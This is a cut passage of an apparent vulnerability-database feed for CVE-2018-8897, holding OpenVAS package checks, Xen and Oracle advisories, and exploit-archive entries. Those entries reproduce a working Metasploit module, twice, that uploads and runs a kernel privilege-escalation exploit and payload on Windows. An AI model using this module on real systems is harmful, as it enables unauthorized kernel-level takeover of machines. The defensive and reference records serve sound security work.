isdpkgvuln(pkg:\"linux-image-4.4.0-1057-aws\", ver:\"4.4.0-1057.66\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1089-raspi2\", ver:\"4.4.0-1089.97\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1092-snapdragon\", ver:\"4.4.0-1092.97\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-generic\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-generic-lpae\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-lowlatency\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc-e500mc\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc-smp\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc64-emb\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-124-powerpc64-smp\", ver:\"4.4.0-124.148\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-9027-euclid\", ver:\"4.4.0-9027.29\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1057.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.13.0.1016.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-euclid\", ver:\"4.4.0.9027.28\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.13.0.1015.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.13.0.41.60\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.13.0.41.60\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.13.0.1015.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1023.22\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.13.0.41.60\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.13.0.1026.30\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.124.130\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1089.89\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1092.84\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:10:57", "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.", "edition": 10, "published": "2018-05-28T00:00:00", "title": "Debian LTS: Security Advisory for xen (DLA-1383-1)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891383", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891383\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian LTS: Security Advisory for xen (DLA-1383-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-28 00:00:00 +0200 (Mon, 28 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-docs-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-23T02:47:23", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-23T00:00:00", "title": "Microsoft Windows - POP/MOV SS Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-23T00:00:00", "id": "1337DAY-ID-30427", "href": "https://0day.today/exploit/description/30427", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n \r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30427"}, {"lastseen": "2018-07-13T21:54:00", "description": "This Metasploit module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS. This Metasploit module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.", "edition": 1, "published": "2018-07-13T00:00:00", "title": "Microsoft Windows #MicrosoftWindows POP/MOV SS Local Privilege Elevation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30720", "href": "https://0day.today/exploit/description/30720", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can BAPlA1/4k <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30720"}], "xen": [{"lastseen": "2018-05-08T23:14:09", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "#### ISSUE DESCRIPTION\nWhen switching stacks, it is critical to have a matching stack segment and stack pointer. To allow an atomic update from what would otherwise be two adjacent instructions, an update which changes the stack segment (either a mov or pop instruction with %ss encoded as the destination register) sets the movss shadow for one instruction.\nThe exact behaviour of the movss shadow is poorly understood.\nIn practice, a movss shadow delays some debug exceptions (e.g. from a hardware breakpoint) until the subsequent instruction has completed. If the subsequent instruction normally transitions to supervisor mode (e.g. a system call), then the debug exception will be taken after the transition to ring0 is completed.\nFor most transitions to supervisor mode, this only confuses Xen into printing a lot of debugging information. For the syscall instruction however, the exception gets taken before the syscall handler can move off the guest stack.\n#### IMPACT\nA malicious PV guest can escalate their privilege to that of the hypervisor.\n#### VULNERABLE SYSTEMS\nAll versions of Xen are vulnerable.\nOnly x86 systems are vulnerable. ARM systems are not vulnerable.\nOnly x86 PV guests can exploit the vulnerability. x86 HVM and PVH guests cannot exploit the vulnerability.\nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users.\n", "edition": 1, "modified": "2018-05-08T16:45:00", "published": "2018-05-08T16:45:00", "id": "XSA-260", "href": "http://xenbits.xen.org/xsa/advisory-260.html", "title": "x86: mishandling of debug exceptions", "type": "xen", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.18-419.0.0.0.11]\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}", "edition": 3, "modified": "2018-09-18T00:00:00", "published": "2018-09-18T00:00:00", "id": "ELSA-2018-4219", "href": "http://linux.oracle.com/errata/ELSA-2018-4219.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.39-400.298.7]\n- net/rds: Fix endless RNR situation (Hakon Bugge) [Orabug: 27645402] \n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4097", "href": "http://linux.oracle.com/errata/ELSA-2018-4097.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "kernel-uek\n[3.8.13-118.20.7]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4098", "href": "http://linux.oracle.com/errata/ELSA-2018-4098.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "description": "[4.1.12-124.14.5]\n- vhost/scsi: fix reuse of &vq->iov[out] in response (Benjamin Coddington) [Orabug: 27928330]\n[4.1.12-124.14.4]\n- kernel.spec: add requires system-release for OL7 (Brian Maly) [Orabug: 27955380] \n- x86/kernel/traps.c: fix trace_die_notifier return value (Kris Van Hees) {CVE-2018-8897}\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}\n- kvm/x86: fix icebp instruction handling (gregkh@linuxfoundation.org) {CVE-2018-1087}", "edition": 6, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4096", "href": "http://linux.oracle.com/errata/ELSA-2018-4096.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:24:06", "description": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation. CVE-2018-8897. Local exploit for Windows platform", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44697", "href": "https://www.exploit-db.com/exploits/44697/", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n\r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44697/"}, {"lastseen": "2018-07-14T01:08:35", "description": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit). CVE-2018-8897. Local exploit for Windows platform. Tags: Metasploit Framework (MSF), L...", "published": "2018-07-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "EDB-ID:45024", "href": "https://www.exploit-db.com/exploits/45024/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can B\u00f6l\u00fck <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def 